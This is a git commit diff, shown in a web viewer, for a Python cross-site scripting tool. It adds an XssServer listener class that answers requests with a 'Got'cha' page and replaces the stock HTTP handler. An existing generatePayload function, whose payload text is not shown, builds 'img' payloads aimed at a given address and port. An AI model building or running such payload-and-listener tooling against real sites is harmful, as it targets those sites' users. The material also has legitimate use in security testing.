xss handler improvement
This commit is contained in:
parent
0758e23026
commit
3d750e6994
@ -4,6 +4,7 @@ import util
|
|||||||
import sys
|
import sys
|
||||||
import http.server
|
import http.server
|
||||||
import socketserver
|
import socketserver
|
||||||
|
from http.server import HTTPServer, BaseHTTPRequestHandler
|
||||||
|
|
||||||
def generatePayload(type, address, port):
|
def generatePayload(type, address, port):
|
||||||
if type == "img":
|
if type == "img":
|
||||||
@ -11,6 +12,27 @@ def generatePayload(type, address, port):
|
|||||||
else:
|
else:
|
||||||
return None
|
return None
|
||||||
|
|
||||||
|
class XssServer(BaseHTTPRequestHandler):
|
||||||
|
def _set_headers(self):
|
||||||
|
self.send_response(200)
|
||||||
|
self.send_header("Content-type", "text/html")
|
||||||
|
self.end_headers()
|
||||||
|
|
||||||
|
def _html(self):
|
||||||
|
content = f"<html><body><h1>Got'cha</h1></body></html>"
|
||||||
|
return content.encode("utf8") # NOTE: must return a bytes object!
|
||||||
|
|
||||||
|
def do_GET(self):
|
||||||
|
self._set_headers()
|
||||||
|
self.wfile.write(self._html())
|
||||||
|
|
||||||
|
def do_HEAD(self):
|
||||||
|
self._set_headers()
|
||||||
|
|
||||||
|
def do_POST(self):
|
||||||
|
self._set_headers()
|
||||||
|
self.wfile.write(self._html())
|
||||||
|
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
|
|
||||||
if len(sys.argv) < 2:
|
if len(sys.argv) < 2:
|
||||||
@ -39,7 +61,6 @@ if __name__ == "__main__":
|
|||||||
print(payload)
|
print(payload)
|
||||||
print()
|
print()
|
||||||
|
|
||||||
Handler = http.server.SimpleHTTPRequestHandler
|
httpd = HTTPServer((local_address, listen_port), XssServer)
|
||||||
with socketserver.TCPServer((local_address, listen_port), Handler) as httpd:
|
print(f"Starting httpd server on {local_address}:{listen_port}")
|
||||||
print("serving at port", listen_port)
|
|
||||||
httpd.serve_forever()
|
httpd.serve_forever()
|
||||||
|
Loading…
Reference in New Issue
Block a user